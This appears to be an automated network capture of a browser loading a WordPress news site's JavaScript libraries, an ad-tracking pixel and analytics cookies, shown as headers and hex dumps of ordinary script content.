                                                        2025-03-11 18:03:05 UTC16384INData Raw: 61 79 3a 30 2c 70 72 65 70 65 6e 64 54 6f 3a 6e 75 6c 6c 2c 66 69 78 65 64 43 6f 6e 74 65 6e 74 50 6f 73 3a 22 61 75 74 6f 22 2c 66 69 78 65 64 42 67 50 6f 73 3a 22 61 75 74 6f 22 2c 6f 76 65 72 66 6c 6f 77 59 3a 22 61 75 74 6f 22 2c 63 6c 6f 73 65 4d 61 72 6b 75 70 3a 27 3c 62 75 74 74 6f 6e 20 74 69 74 6c 65 3d 22 25 74 69 74 6c 65 25 22 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 6d 66 70 2d 63 6c 6f 73 65 22 3e 26 23 32 31 35 3b 3c 2f 62 75 74 74 6f 6e 3e 27 2c 74 43 6c 6f 73 65 3a 22 43 6c 6f 73 65 20 28 45 73 63 29 22 2c 74 4c 6f 61 64 69 6e 67 3a 22 4c 6f 61 64 69 6e 67 2e 2e 2e 22 2c 61 75 74 6f 46 6f 63 75 73 4c 61 73 74 3a 21 30 7d 7d 2c 65 2e 66 6e 2e 6d 61 67 6e 69 66 69 63 50 6f 70 75 70 3d 66 75 6e 63 74 69 6f 6e 28 6e
                                                        Data Ascii: ay:0,prependTo:null,fixedContentPos:"auto",fixedBgPos:"auto",overflowY:"auto",closeMarkup:'<button title="%title%" type="button" class="mfp-close">&#215;</button>',tClose:"Close (Esc)",tLoading:"Loading...",autoFocusLast:!0}},e.fn.magnificPopup=function(n
                                                        2025-03-11 18:03:05 UTC16384INData Raw: 73 74 61 74 65 5f 63 6c 61 73 73 29 7c 7c 72 2e 61 64 64 43 6c 61 73 73 28 22 6e 6f 74 72 61 6e 73 69 74 69 6f 6e 22 29 2c 64 3e 61 29 7b 69 66 28 22 73 63 72 6f 6c 6c 22 3d 3d 3d 74 2e 6d 6f 64 65 29 7b 69 66 28 64 3c 6e 2b 6c 29 72 65 74 75 72 6e 7d 65 6c 73 65 20 69 66 28 64 3c 6e 2d 69 29 72 65 74 75 72 6e 3b 72 2e 61 64 64 43 6c 61 73 73 28 74 2e 73 74 61 74 65 5f 63 6c 61 73 73 29 2c 22 73 63 72 6f 6c 6c 22 3d 3d 3d 74 2e 6d 6f 64 65 3f 28 63 3d 73 2d 75 29 3c 2d 6c 26 26 28 63 3d 2d 6c 29 3a 22 70 69 6e 6e 65 64 22 3d 3d 3d 74 2e 6d 6f 64 65 26 26 75 3e 35 26 26 64 3e 6c 2b 69 26 26 28 63 3d 2d 6c 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 2e 6f 6e 53 63 72 6f 6c 6c 44 6f 77 6e 26 26 74 2e 6f 6e 53 63 72 6f 6c 6c 44 6f 77 6e
                                                        Data Ascii: state_class)||r.addClass("notransition"),d>a){if("scroll"===t.mode){if(d<n+l)return}else if(d<n-i)return;r.addClass(t.state_class),"scroll"===t.mode?(c=s-u)<-l&&(c=-l):"pinned"===t.mode&&u>5&&d>l+i&&(c=-l),"function"==typeof t.onScrollDown&&t.onScrollDown
                                                        2025-03-11 18:03:05 UTC16384INData Raw: 61 2e 63 75 72 72 65 6e 74 5f 70 61 67 65 3d 6e 2e 64 61 74 61 2e 63 75 72 72 65 6e 74 5f 70 61 67 65 2b 31 2c 6e 2e 72 65 71 75 65 73 74 5f 61 6a 61 78 28 22 6e 65 78 74 22 29 29 7d 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6c 69 63 6b 5f 70 72 65 76 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 74 68 69 73 2c 69 3d 6e 2e 6e 61 76 5f 70 72 65 76 3b 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 65 28 69 29 2e 68 61 73 43 6c 61 73 73 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 6e 2e 6c 6f 63 6b 5f 61 63 74 69 6f 6e 7c 7c 28 6e 2e 64 61 74 61 2e 63 75 72 72 65 6e 74 5f 70 61 67 65 3d 6e 2e 64 61 74 61 2e 63 75 72 72 65 6e 74 5f 70 61 67 65 2d 31 2c 6e 2e 72 65 71 75 65 73 74 5f 61 6a 61 78 28 22 70 72 65 76 22 29 29 7d 2c 6f 2e 70 72 6f
                                                        Data Ascii: a.current_page=n.data.current_page+1,n.request_ajax("next"))},o.prototype.click_prev=function(t){var n=this,i=n.nav_prev;t.preventDefault(),e(i).hasClass("disabled")||n.lock_action||(n.data.current_page=n.data.current_page-1,n.request_ajax("prev"))},o.pro
                                                        2025-03-11 18:03:05 UTC16384INData Raw: 6e 61 76 3f 69 2e 63 6f 6e 74 72 6f 6c 73 3a 69 2e 63 6f 6e 74 61 69 6e 65 72 2e 64 61 74 61 73 65 74 2e 6e 61 76 2c 69 2e 61 75 74 6f 70 6c 61 79 3d 76 6f 69 64 20 30 3d 3d 3d 69 2e 63 6f 6e 74 61 69 6e 65 72 2e 64 61 74 61 73 65 74 2e 61 75 74 6f 70 6c 61 79 3f 69 2e 61 75 74 6f 70 6c 61 79 3a 69 2e 63 6f 6e 74 61 69 6e 65 72 2e 64 61 74 61 73 65 74 2e 61 75 74 6f 70 6c 61 79 2c 69 2e 61 75 74 6f 70 6c 61 79 54 69 6d 65 6f 75 74 3d 76 6f 69 64 20 30 3d 3d 3d 69 2e 63 6f 6e 74 61 69 6e 65 72 2e 64 61 74 61 73 65 74 2e 64 65 6c 61 79 3f 69 2e 61 75 74 6f 70 6c 61 79 54 69 6d 65 6f 75 74 3a 70 61 72 73 65 49 6e 74 28 69 2e 63 6f 6e 74 61 69 6e 65 72 2e 64 61 74 61 73 65 74 2e 64 65 6c 61 79 29 2c 69 2e 67 75 74 74 65 72 3d 76 6f 69 64 20 30 3d 3d 3d 69 2e
                                                        Data Ascii: nav?i.controls:i.container.dataset.nav,i.autoplay=void 0===i.container.dataset.autoplay?i.autoplay:i.container.dataset.autoplay,i.autoplayTimeout=void 0===i.container.dataset.delay?i.autoplayTimeout:parseInt(i.container.dataset.delay),i.gutter=void 0===i.
                                                        2025-03-11 18:03:05 UTC16384INData Raw: 6f 6e 22 29 2c 68 2e 61 64 64 43 6c 61 73 73 28 65 2e 6e 65 78 74 42 75 74 74 6f 6e 2c 22 74 6e 73 2d 6e 65 78 74 22 29 29 2c 76 6f 69 64 20 30 21 3d 3d 65 2e 70 72 65 76 42 75 74 74 6f 6e 26 26 28 65 2e 70 72 65 76 42 75 74 74 6f 6e 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 6c 61 62 65 6c 22 2c 22 50 72 65 76 69 6f 75 73 20 62 75 74 74 6f 6e 22 29 2c 68 2e 61 64 64 43 6c 61 73 73 28 65 2e 70 72 65 76 42 75 74 74 6f 6e 2c 22 74 6e 73 2d 70 72 65 76 22 29 29 7d 7d 29 2c 78 26 26 78 2e 6c 65 6e 67 74 68 26 26 68 2e 66 6f 72 45 61 63 68 28 78 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 6a 6e 65 77 73 2e 74 69 63 6b 65 72 28 7b 63 6f 6e 74 61 69 6e 65 72 3a 65 7d 29 7d 29 2c 43 26 26 43 2e 6c 65 6e 67 74 68 26 26 68 2e 66 6f 72 45 61 63 68
                                                        Data Ascii: on"),h.addClass(e.nextButton,"tns-next")),void 0!==e.prevButton&&(e.prevButton.setAttribute("aria-label","Previous button"),h.addClass(e.prevButton,"tns-prev"))}}),x&&x.length&&h.forEach(x,function(e,t){jnews.ticker({container:e})}),C&&C.length&&h.forEach
                                                        2025-03-11 18:03:05 UTC16384INData Raw: 26 6f 2e 6d 65 67 61 5f 6d 65 6e 75 5f 69 6e 69 74 28 74 68 69 73 2c 6f 29 7d 7d 29 3a 22 61 6e 69 6d 61 74 65 54 72 61 6e 73 66 6f 72 6d 22 3d 3d 3d 6e 3f 74 2e 73 75 70 65 72 66 69 73 68 28 7b 61 6e 69 6d 61 74 69 6f 6e 54 79 70 65 3a 6e 2c 70 6f 70 55 70 53 65 6c 65 63 74 6f 72 3a 22 75 6c 2c 2e 73 75 62 2d 6d 65 6e 75 22 2c 64 69 73 61 62 6c 65 48 49 3a 21 30 2c 73 70 65 65 64 3a 32 30 30 2c 64 65 6c 61 79 3a 30 2c 6f 6e 53 68 6f 77 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 65 28 74 68 69 73 29 2e 66 69 6e 64 28 22 2e 6a 65 67 5f 6e 65 77 73 66 65 65 64 22 29 2e 6c 65 6e 67 74 68 26 26 6f 2e 6d 65 67 61 5f 6d 65 6e 75 5f 69 6e 69 74 28 74 68 69 73 2c 6f 29 7d 7d 29 3a 22 6e 6f 6e 65 22 3d 3d 3d 6e 3f 74 2e 73 75 70 65 72 66 69 73 68 28 7b 61 6e 69 6d 61 74
                                                        Data Ascii: &o.mega_menu_init(this,o)}}):"animateTransform"===n?t.superfish({animationType:n,popUpSelector:"ul,.sub-menu",disableHI:!0,speed:200,delay:0,onShow:function(){e(this).find(".jeg_newsfeed").length&&o.mega_menu_init(this,o)}}):"none"===n?t.superfish({animat
                                                        2025-03-11 18:03:05 UTC16384INData Raw: 65 64 5f 69 6d 61 67 65 20 61 3a 6e 6f 74 28 2e 77 70 2d 63 61 70 74 69 6f 6e 2d 74 65 78 74 20 61 29 22 29 2e 6f 6e 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 2e 65 78 70 61 6e 64 5f 73 69 6e 67 6c 65 5f 66 65 61 74 75 72 65 64 28 74 68 69 73 29 7d 29 2c 74 2e 63 6f 6e 74 61 69 6e 65 72 2e 66 69 6e 64 28 22 2e 66 65 61 74 75 72 65 64 5f 67 61 6c 6c 65 72 79 20 61 22 29 2e 6f 6e 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 2e 65 78 70 61 6e 64 5f 66 65 61 74 75 72 65 64 5f 67 61 6c 6c 65 72 79 28 74 68 69 73 29 7d 29 2c 74 2e 63 6f 6e 74 61 69 6e 65 72 2e 66 69 6e 64 28 22 2e 63 6f 6e 74 65 6e 74 2d
                                                        Data Ascii: ed_image a:not(.wp-caption-text a)").on("click",function(e){e.preventDefault(),t.expand_single_featured(this)}),t.container.find(".featured_gallery a").on("click",function(e){e.preventDefault(),t.expand_featured_gallery(this)}),t.container.find(".content-
                                                        2025-03-11 18:03:05 UTC14539INData Raw: 79 70 65 6f 66 20 6a 6e 65 77 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6a 6e 65 77 73 2e 6c 69 62 72 61 72 79 26 26 6a 6e 65 77 73 2e 6c 69 62 72 61 72 79 2e 77 69 6e 4c 6f 61 64 28 6e 2e 64 69 73 70 61 74 63 68 2e 62 69 6e 64 28 6e 29 29 2c 65 28 77 69 6e 64 6f 77 29 2e 6f 6e 28 22 73 63 72 6f 6c 6c 20 72 65 73 69 7a 65 22 2c 65 2e 70 72 6f 78 79 28 6e 2e 64 69 73 70 61 74 63 68 2c 6e 29 29 29 3a 65 28 77 69 6e 64 6f 77 29 2e 6f 66 66 28 22 73 63 72 6f 6c 6c 20 72 65 73 69 7a 65 22 2c 65 2e 70 72 6f 78 79 28 6e 2e 64 69 73 70 61 74 63 68 2c 6e 29 29 7d 7d 2c 64 69 73 70 61 74 63 68 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2c 6e 3d 74 2e 65 6c 65 6d 65 6e 74 2e 68 61 73 43 6c 61 73 73 28 22 63 6c 6f 73 65 64 22
                                                        Data Ascii: ypeof jnews&&"object"==typeof jnews.library&&jnews.library.winLoad(n.dispatch.bind(n)),e(window).on("scroll resize",e.proxy(n.dispatch,n))):e(window).off("scroll resize",e.proxy(n.dispatch,n))}},dispatch:function(){var t=this,n=t.element.hasClass("closed"


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        55192.168.2.449804198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:03:04 UTC590OUTGET /wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0 HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://hardylive.com/category/eprint/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:03:05 UTC219INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:03:03 GMT
                                                        Content-Type: application/javascript
                                                        Content-Length: 37931
                                                        Connection: close
                                                        Last-Modified: Mon, 23 Dec 2024 13:58:53 GMT
                                                        Accept-Ranges: bytes
                                                        2025-03-11 18:03:05 UTC16165INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 74 2c 65 2c 6e 3b 74 3d 5b 66 75 6e 63 74 69 6f 6e 28 72 2c 74 2c 65 29 7b 65 28 31 29 2c 65 28 37 33 29 2c 65 28 37 36 29 2c 65 28 37 38 29 2c 65 28 38 30 29 2c 65 28 39 32 29 2c 65 28 39 33 29 2c 65 28 39 35 29 2c 65 28 39 38 29 2c 65 28 31 30 30 29 2c 65 28 31 30 31 29 2c 65 28 31 31 30 29 2c 65 28 31 31 31 29 2c 65 28 31 31 34 29 2c 65 28 31 32 30 29 2c 65 28 31 33 35 29 2c 65 28 31 33 37 29 2c 65 28 31 33 38 29 2c 72 2e 65 78 70 6f 72 74 73 3d 65 28 31 33 39 29 7d 2c 66 75 6e 63 74 69 6f 6e 28 72 2c 74 2c 65 29 7b 76 61 72 20 6e 3d 65 28 32 29 2c 6f 3d 65 28 36 37 29 2c 61 3d 65 28 31 31 29 2c 69 3d 65 28 36 38 29 2c 63 3d 41 72 72 61 79 3b 6e 28 7b 74 61 72 67
                                                        Data Ascii: !function(r){"use strict";var t,e,n;t=[function(r,t,e){e(1),e(73),e(76),e(78),e(80),e(92),e(93),e(95),e(98),e(100),e(101),e(110),e(111),e(114),e(120),e(135),e(137),e(138),r.exports=e(139)},function(r,t,e){var n=e(2),o=e(67),a=e(11),i=e(68),c=Array;n({targ
                                                        2025-03-11 18:03:05 UTC16384INData Raw: 28 65 29 29 72 65 74 75 72 6e 20 61 28 6e 28 65 2c 72 29 29 3b 74 68 72 6f 77 20 6e 65 77 20 75 28 69 28 72 29 2b 22 20 69 73 20 6e 6f 74 20 69 74 65 72 61 62 6c 65 22 29 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 72 2c 74 2c 65 29 7b 76 61 72 20 6e 3d 65 28 38 38 29 2c 6f 3d 65 28 32 38 29 2c 61 3d 65 28 31 36 29 2c 69 3d 65 28 38 35 29 2c 63 3d 65 28 33 32 29 28 22 69 74 65 72 61 74 6f 72 22 29 3b 72 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 69 66 28 21 61 28 72 29 29 72 65 74 75 72 6e 20 6f 28 72 2c 63 29 7c 7c 6f 28 72 2c 22 40 40 69 74 65 72 61 74 6f 72 22 29 7c 7c 69 5b 6e 28 72 29 5d 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 76 61 72 20 6f 3d 6e 28 38 39 29 2c 61 3d 6e 28 32 30 29 2c 69 3d 6e 28 31 34 29 2c 63 3d 6e 28
                                                        Data Ascii: (e))return a(n(e,r));throw new u(i(r)+" is not iterable")}},function(r,t,e){var n=e(88),o=e(28),a=e(16),i=e(85),c=e(32)("iterator");r.exports=function(r){if(!a(r))return o(r,c)||o(r,"@@iterator")||i[n(r)]}},function(t,e,n){var o=n(89),a=n(20),i=n(14),c=n(
                                                        2025-03-11 18:03:05 UTC5382INData Raw: 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 72 65 74 75 72 6e 20 73 28 66 2c 5b 5d 2c 72 29 2c 21 30 7d 63 61 74 63 68 28 72 29 7b 72 65 74 75 72 6e 21 31 7d 7d 2c 68 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 69 66 28 21 61 28 72 29 29 72 65 74 75 72 6e 21 31 3b 73 77 69 74 63 68 28 69 28 72 29 29 7b 63 61 73 65 22 41 73 79 6e 63 46 75 6e 63 74 69 6f 6e 22 3a 63 61 73 65 22 47 65 6e 65 72 61 74 6f 72 46 75 6e 63 74 69 6f 6e 22 3a 63 61 73 65 22 41 73 79 6e 63 47 65 6e 65 72 61 74 6f 72 46 75 6e 63 74 69 6f 6e 22 3a 72 65 74 75 72 6e 21 31 7d 74 72 79 7b 72 65 74 75 72 6e 20 79 7c 7c 21 21 6c 28 70 2c 75 28 72 29 29 7d 63 61 74 63 68 28 72 29 7b 72 65 74 75 72 6e 21 30 7d 7d 3b 68 2e 73 68 61 6d 3d 21 30 2c 72 2e 65 78 70 6f 72 74 73 3d 21 73 7c 7c 6f 28 28 66 75
                                                        Data Ascii: return!1;try{return s(f,[],r),!0}catch(r){return!1}},h=function(r){if(!a(r))return!1;switch(i(r)){case"AsyncFunction":case"GeneratorFunction":case"AsyncGeneratorFunction":return!1}try{return y||!!l(p,u(r))}catch(r){return!0}};h.sham=!0,r.exports=!s||o((fu


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        56192.168.2.449805198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:03:04 UTC589OUTGET /wp-includes/js/dist/url.min.js?ver=e87eb76272a3a08402d2 HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://hardylive.com/category/eprint/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:03:05 UTC218INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:03:03 GMT
                                                        Content-Type: application/javascript
                                                        Content-Length: 8375
                                                        Connection: close
                                                        Last-Modified: Mon, 23 Dec 2024 13:58:53 GMT
                                                        Accept-Ranges: bytes
                                                        2025-03-11 18:03:05 UTC8375INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 28 28 29 3d 3e 7b 76 61 72 20 65 3d 7b 39 36 38 31 3a 65 3d 3e 7b 76 61 72 20 74 3d 7b c3 80 3a 22 41 22 2c c3 81 3a 22 41 22 2c c3 82 3a 22 41 22 2c c3 83 3a 22 41 22 2c c3 84 3a 22 41 22 2c c3 85 3a 22 41 22 2c e1 ba a4 3a 22 41 22 2c e1 ba ae 3a 22 41 22 2c e1 ba b2 3a 22 41 22 2c e1 ba b4 3a 22 41 22 2c e1 ba b6 3a 22 41 22 2c c3 86 3a 22 41 45 22 2c e1 ba a6 3a 22 41 22 2c e1 ba b0 3a 22 41 22 2c c8 82 3a 22 41 22 2c e1 ba a2 3a 22 41 22 2c e1 ba a0 3a 22 41 22 2c e1 ba a8 3a 22 41 22 2c e1 ba aa 3a 22 41 22 2c e1 ba ac 3a 22 41 22 2c c3 87 3a 22 43 22 2c e1 b8 88 3a 22 43 22 2c c3 88 3a 22 45 22 2c c3 89 3a 22 45 22 2c c3 8a 3a 22 45 22 2c c3 8b
                                                        Data Ascii: /*! This file is auto-generated */(()=>{var e={9681:e=>{var t={:"A",:"A",:"A",:"A",:"A",:"A",:"A",:"A",:"A",:"A",:"A",:"AE",:"A",:"A",:"A",:"A",:"A",:"A",:"A",:"A",:"C",:"C",:"E",:"E",:"E",


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        57192.168.2.449809198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:03:05 UTC595OUTGET /wp-includes/js/dist/api-fetch.min.js?ver=d387b816bc1ed2042e28 HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://hardylive.com/category/eprint/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:03:05 UTC218INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:03:04 GMT
                                                        Content-Type: application/javascript
                                                        Content-Length: 5535
                                                        Connection: close
                                                        Last-Modified: Mon, 23 Dec 2024 13:58:53 GMT
                                                        Accept-Ranges: bytes
                                                        2025-03-11 18:03:05 UTC5535INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 7b 64 3a 28 74 2c 72 29 3d 3e 7b 66 6f 72 28 76 61 72 20 6e 20 69 6e 20 72 29 65 2e 6f 28 72 2c 6e 29 26 26 21 65 2e 6f 28 74 2c 6e 29 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 6e 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 72 5b 6e 5d 7d 29 7d 2c 6f 3a 28 65 2c 74 29 3d 3e 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 65 2c 74 29 7d 2c 74 3d 7b 7d 3b 65 2e 64 28 74 2c 7b 64 65 66 61 75 6c 74 3a 28 29 3d 3e 54 7d 29 3b 63 6f 6e 73 74 20 72 3d 77 69 6e 64 6f 77 2e
                                                        Data Ascii: /*! This file is auto-generated */(()=>{"use strict";var e={d:(t,r)=>{for(var n in r)e.o(r,n)&&!e.o(t,n)&&Object.defineProperty(t,n,{enumerable:!0,get:r[n]})},o:(e,t)=>Object.prototype.hasOwnProperty.call(e,t)},t={};e.d(t,{default:()=>T});const r=window.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        58192.168.2.44980845.77.88.114435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:03:05 UTC810OUTGET /ad.php?do=imp&aid=1125399&zid=117078&t=1741716181&auth=108567e63140a07de4bc55b82a10706c&oid=27064&wd=-1&ht=-1&ref=https%3A%2F%2Fhardylive.com%2F&uri=https%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2F HTTP/1.1
                                                        Host: g.adspeed.net
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Sec-Fetch-Storage-Access: active
                                                        Referer: https://hardylive.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:03:06 UTC291INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:03:06 GMT
                                                        Content-Type: image/gif
                                                        Content-Length: 43
                                                        Connection: close
                                                        Set-Cookie: impuniraw=1125399-1741802586; Max-Age=2592000; SameSite=None; Secure
                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                        Cache-Control: max-age=315360000
                                                        2025-03-11 18:03:06 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 04 02 04 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                        Data Ascii: GIF89a!,D;


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        59192.168.2.449813198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:03:07 UTC2060OUTGET /wp-content/plugins/ajax-login-and-registration-modal-popup/assets/img/cd-icon-close.svg HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2025-03-11%2018%3A03%3A01%7C%7C%7Cep%3Dhttps%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2F%7C%7C%7Crf%3Dhttps%3A%2F%2Fhardylive.com%2F; sbjs_first_add=fd%3D2025-03-11%2018%3A03%3A01%7C%7C%7Cep%3Dhttps%3A%2F%2Fhardylive.com%2Fcategory%2Feprint%2F%7C%7C%7Crf%3Dhttps%3A%2F%2Fhardylive.com%2F; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cmtke%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cmtke%3D%28none%29; sbjs_udata=vst%3D1%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F134.0.0.0%20Safari%2F537.36; sbjs_session=pgs%3D1%7C%7C%7Ccpg%3Dhttps%3A%2F%2 [TRUNCATED]
                                                        2025-03-11 18:03:08 UTC208INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:03:06 GMT
                                                        Content-Type: image/svg+xml
                                                        Content-Length: 603
                                                        Connection: close
                                                        Last-Modified: Wed, 18 Dec 2024 14:55:36 GMT
                                                        Accept-Ranges: bytes
